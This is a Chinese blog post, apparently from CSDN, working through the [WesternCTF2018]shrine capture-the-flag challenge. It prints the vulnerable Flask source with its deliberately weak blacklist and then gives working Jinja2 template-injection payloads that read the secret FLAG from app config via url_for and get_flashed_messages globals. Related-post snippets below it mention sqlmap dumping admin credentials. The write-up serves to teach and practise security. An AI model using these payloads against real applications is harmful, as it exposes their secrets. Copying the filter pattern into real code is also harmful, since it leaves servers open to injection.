一天一道ctf 第31天(flask模板注入)

最新推荐文章于 2024-03-13 23:51:24 发布
最新推荐文章于 2024-03-13 23:51:24 发布
阅读量1.5k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/118710598
版权

[WesternCTF2018]shrine1
题目源码:

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

网上的解法都是大同小异,我在这里也仅作记录,后面有了更好的理解再回来补。
关于flask的简单介绍可以看这篇文章,读懂这道题的代码够了。
https://www.cnblogs.com/chaojiyingxiong/p/9549987.html
这道题是SSTI模板注入,简单理解下就是一些特殊情况数据会被当做代码来执行,而且得是{{}}里面的数据才行。在源码里可以看到@app.route('/shrine/<path:shrine>'),试着在URL后面加上/shrine/{{7*7}}/shrine/{{7*'7'}},可以看到算式被执行了
在这里插入图片描述
在这里插入图片描述
再在源码里找到app.config['FLAG'] = os.environ.pop('FLAG'),用os.environ取出Linux系统中的FLAG变量赋值给了app.config,猜测执行config就能得到flag。但是config和self都在黑名单里,而且这里是先替换()再过滤黑名单,没法用con(fig这类绕过。
WP是用了url_for和get_flashed_messages来获取current_app全局变量,current_app是一个flask的实例,算是通过对象之间的引用来获得被禁止对象信息的一种吧。__globals__是python里的函数,可以看到所有可读的全局变量。

/shrine/{{url_for.__globals__['current_app'].config['FLAG']}}

/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

在这里插入图片描述

scrawman
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之路:关于Flask模板注入
zw05011的博客
01-07 5777
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入
CTF中的Flask之bypass
qq_38755190的博客
01-31 2147
前言 继上次发布关于Flask的文章,之后说要结合的例题。今小小的总结一波,当然这就是入门,最近Flask题目也比较火热啊。下面我们开始吧。 存在模板注入漏洞的原因 首先在做题之前,我们先了解一下,存在漏洞的原因,Flask模板注入和大多数的SQL注入的原因差不多,都是因为没有严格的过滤变量导致的,存在变量可控,还有就是一些开发人员对安全的不重视等。当然,存在模板注入漏洞的原因还有使用不固定的模板模板注入的危险也是不容小觑的。 ctf中常见的例题 0x01 :XCTF-web高手区-Confusio
CTF赛题分析之 Flask 目录穿越
程序员阿飘 的博客
01-09 1103
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
BUU CTF web(三)
0xdawn的博客
04-30 7469
[WesternCTF2018]shrine import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shr...
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
qq_39947980的博客
03-13 2097
CTF题型 SSTI(1)基础必过 学会自己手动构造payload
CTF专题一2021网络WEB题目解析
kali_Ma的博客
10-19 6796
0x01 前言 背景: 2021年10月15日的“中国能源网络安全大赛” 感觉WEB的考点形形色色,其中有1道偏于黑盒测试的简单题目,4道是白盒审计类题目,还有一道是Python的反序列化题目题目名称大致如下: 因为唯一的一道黑盒题目还是文件包含题目,所以将题目源代码全部扒下来了,给大家提供复现环境。(flag自己创建)。 为了感谢广大读者伙伴的支持,准备了以下福利给到大家: [一>获取<一] 1、200多本网络安全系列电子书(该有的都有了) 2、全套工具包(最全中文版,想用哪个用哪个)
flask框架漏洞
JJT
05-14 5362
ctf里遇到了关于flask框架漏洞的题,此篇博文较为详细 转自https://www.jianshu.com/p/56614e46093e 一、简介 Flask 是一个使用 Python 编写的轻量级 Web 应用框架。Flask 依赖两个外部库: Jinja2模板引擎和WSGI 工具集。 1、常用概念 WSGI 只是一种接口,它只适用于 Python 语言,其全称为 Web Server Gateway Interface,定义了 web服务器和 web应用之间的接口规范。也就是说,只要 w.
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
CTF技能树,为初学者的一个认识ctf
10-22
ctf的一个树状图而已
CTF从入门到提升(一).docx
12-18
CTF从入门到提升(一) CTF(Capture The Flag)是一种网络安全竞赛的形式,起源于西方传统运动,两军互相争夺旗帜,夺取敌军旗帜代表战败。在信息安全领域,CTF是通过各种攻击手法,获取服务器后寻找指定的字段,...
pin-in-CTF:使用intel pin来求解一部分CTF challenge
05-09
【标题】:“pin-in-CTF:利用Intel Pin工具解决CTF挑战” 【知识点详解】 Intel Pin是一款强大的动态二进制分析工具,主要用于程序行为分析、性能监测、代码插桩等场景。在“pin-in-CTF”项目中,开发者或安全...
CTF题型 SSTI(2) Flask-SSTI典型题巩固
qq_39947980的博客
03-13 1100
复现环境:2023 极客大挑战 klf系列 https://github.com/SycloverTeam/GeekChallenge2023/tree/main/Web 题目flag没有内容自己加内容测试。请参考 https://blog.csdn.net/qq_39947980/article/details/136692512?请参考 https://blog.csdn.net/qq_39947980/article/details/136692512?尝试判读出网不 发现出网 无回显。
Python flask渲染模板注入
weixin_40872714的博客
04-07 4035
2018-TokyoWesterns-Web-shrine 参考链接: https://blog.csdn.net/Onlyone_1314/article/details/121875761 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') #Flask提供了很多种方式来加载配置。比如,你可以像在字典中添加一个键值对一样来 #设置一个配置:app.config[‘FL
【WEB攻防】Flask(Jinja2) 服务端模板注入漏洞 原理+防御
AAAAAAAAAAAA66的博客
12-19 6720
前面写CTF题目的时候做过几道SSTI模板注入题目。最近又遇到了一个不错的CTF网站, http://bmzclub.cn 里面不但有CTF题目,更重要的是有漏洞环境,不需要自己去一个一个去安装,对于我这样的懒人简直是福音。 目录 Flask模板注入简介 Flask和Jinja2介绍: 注入原理 复现 手动注入 工具探测 Flask模板注入简介 Flask和Jinja2介绍: 1.Flask是一个轻量级的基于Python的web框架。 2.Jinja 模板只是一个属于.
buuctf-[WesternCTF2018]shrine(小宇特详解)
小宇的web博客
02-26 1509
buuctf-[WesternCTF2018]shrine(小宇特详解) 1.先看题目 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:
CTF实战(faka注入
Marsper的博客
09-18 1301
CTF实战 SQL注入(faka) 方法一:蚁键注入 首先获取实战链接 访问链接打开,并按上篇文章所学寻找相关post提交处,设法找到注入点,如图,得知付款处即为post提交处 打开burp实行抓包,检测注入点是否正确 将注入点链接抛入sqlmap中寻找准确注入点,找出数据库,爆出后台管理员密码 输入sqlmap.py -u “117.167.136.244:28088/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --dum
flask之ssti模版注入从零到入门
Red Rapefruit
08-16 1053
前言 在学习ssti模版注入的时候,发现国内文章对于都是基于python基础之上的,对于基础代码讲的较少,而对于一些从事安全的新手师傅们,可能python只停留在写脚本上,所以上手的时候可能有点难度,毕竟不是搞python flask开发。就本人学习ssti而言,入手有点难度,所以特写此文,对于一些不需要深究python但是需要学习ssti的师傅,本文可能让你对flask的ssti有所了解。 ssti漏洞成因 ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tor
前端分析-202307110072
最新发布
08-22
前端分析-202307110072
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值